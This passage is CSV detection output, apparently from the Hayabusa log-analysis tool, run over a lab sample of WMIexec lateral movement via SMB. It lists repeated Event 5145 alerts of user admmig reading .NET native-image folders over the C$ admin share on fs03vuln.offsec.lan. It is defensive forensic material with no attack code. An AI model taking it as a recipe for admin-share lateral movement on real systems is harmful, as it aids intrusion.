10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 